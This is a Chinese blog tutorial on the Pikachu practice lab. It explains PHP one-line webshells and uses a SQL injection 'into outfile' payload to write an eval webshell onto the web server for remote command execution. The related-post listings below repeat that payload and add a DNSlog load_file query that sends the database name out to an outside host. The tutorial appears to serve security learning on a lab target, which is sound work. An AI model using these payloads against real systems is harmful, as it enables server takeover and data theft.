sql-inject 通过一句话木马对服务器进行远程控制

最新推荐文章于 2025-02-17 23:42:06 发布
原创 最新推荐文章于 2025-02-17 23:42:06 发布 · 757 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了一句话木马的概念,它是如何利用编程语言执行操作系统命令的。接着,通过SQL注入漏洞,解释了如何将恶意代码写入服务器,并利用into outfile方法在满足特定条件时执行。通过实例展示了在成功注入后,如何远程控制服务器执行命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.一句话木马
说简单点,它就是利用各种语言提供的用来执行操作系统命令的函数去构造一个简单的木马程序,我们可以把这个函数直接写到一个文件里去,通过对这个文件的访问,去执行这个函数,向这个函数去传入我们想要进行的操作,这个函数会被执行,然后执行我们想要的操作
在这里插入图片描述
2.通过SQL Inject漏洞写入恶意代码
我们可以利用into oufile来传入我们的木马,但并不是很容易就可以传进去的,它是有前提条件的
在这里插入图片描述
在满足前提条件的情况下,我们可以开始测试,我们仍然来到pikachu的字符型注入
payload:kobe' union select "<?php @eval($_GET['test'])?.",2 into outfile "/var/www/html/1.php"#
如果我们没有在数据库中关闭这个选项,就会出现这个情况
在这里插入图片描述
如果我们满足了所有条件的话,页面会这样显示
在这里插入图片描述
我们不用在意这些,现在可以访问一下我们刚放进去的东西

在这里插入图片描述
远程的命令执行是一样的
在这里插入图片描述
提交完后直接访问一下,之后我们就可以实现远程控制命令执行了
在这里插入图片描述
在这里插入图片描述

MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 532
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
一句话木马写入以及通过sql进行服务器的远程控制
weixin_44720762的博客
04-21 1994
在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于sql盲注尚处于学习和摸索状态,存在对些许知识点和概念理解尚不清晰甚至是完全偏差的问题。此博客亦是只起到对现所学知识的一个记录。所以只起到一个借鉴的作用,并不建议读者用作专业知识学习。 在演示通过sql进行服务器的远程控制之前,必须首先清除两个基本的概念,也就是一句话木马以及如何通过into_outfile写入代码并控...
SQL Inject
辉小鱼的博客
09-09 605
SQL Inject 发生于应用程序与数据库层的安全漏洞,网站内部直接发送的SQL请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造SQL语句, 如果用户输入的数据被构造成恶意SQL代码,web应用又未对动态构造的SQL语句使用的参数进行审查,则会带来影响不到的危险。
Sql Inject-SQL注入
田田云逸的博客
04-28 600
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。哦,SQL注入漏洞,可怕的漏洞。
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 3664
sql注入
WebWall-05.SQL-Inject(SQL注入漏洞)
凯歌响起的博客
08-27 459
数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入 点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。......
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5388
Pikachu靶场–Sql
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3347
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
基于pikachu漏洞平台的 --SQL注入攻击学习与总结
Mr.hu
10-16 1809
SQL注入攻击 基础知识 常见注释符号(官方链接): mysql> SELECT 1+1; # 行内注释 mysql> SELECT 1+1; -- 行内注释 mysql> SELECT 1 /*行内注释 */ + 1; mysql> SELECT 1+ /* 多行注释 */ 1; mysql> SELECT * FROM table1 WHERE a=1 /*! AND b=2 */ 其中/*! */ 里面的语句会被MySQL识别并执行,但是会被其他系统
渗透测试工程师面试题总结(一)
记录开发和安全学习过程中的点点滴滴
08-26 1670
对渗透测试工程师的面试题进行总结
SQL INJECTION注入之经典教程
06-28
关于SQL注入的两篇经典文章,国外的专业机构写的.对于有一定SQL编程经验又想了解SQL inject的人来说是不错的教程.
SQL注入Injection)简介
cnds123的专栏
11-25 6623
SQL注入Injection)简介 SQL注入SQL injection),是发生于应用程序与数据库层的安全漏洞。只要是支持处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。 是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。 SQL注入演示 SQL命令
一句话木马的适用环境和工作原理/原理应用解析
kendyhj9999的专栏
01-26 1805
一句话木马的适用环境和工作原理/原理应用解析 2011-12-20 10:17:27     我来说两句       收藏    我要投稿  http://www.2cto.com/Article/201112/114599.html 一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据
SQL注入SQL Injection)详解与实战
最新发布
佛系摆烂
02-17 1758
SQL注入是一种通过用户输入构造恶意SQL语句,干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。
通过SQL inject漏洞写入恶意代码
weixin_43858799的博客
04-15 279
一、sqli漏洞演示: 1.通过SQL inject漏洞写入恶意代码 默认情况下:secure_file_priv是关闭的 首先通过show global variables like ‘%secure%’; 然后切会pikachu做测试 获得操作系统权限: allen’ union select " <?php @eval($_GET['test'])?>",2 into ou...
墨者学院 - 远程电子数据取证-木马分析
多崎巡礼的博客
08-28 2206
第一题 驱动级文件隐藏 此驱动级隐藏文件会在服务项增加一个xlkfs的服务 驱动文件路径为:c:\WINDOWS\system32\drivers\xlkfs.sys 配置文件路径为:c:\WINDOWS\xlkfs.ini 转自:http://www.91ri.org/15356.html 独自等待   解题思路: 连接上服务器,先搜索SEO找到seo文件夹路径,在C:\Inet...
Web安全-一句话木马
mmxhappy的专栏
02-04 1923
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?先来看看最简单的一句话木马:?【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 4389
命令执行漏洞之远程命令执行的基础操作
SQL注入篇——一句话木马
爱国小白帽
01-08 6885
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值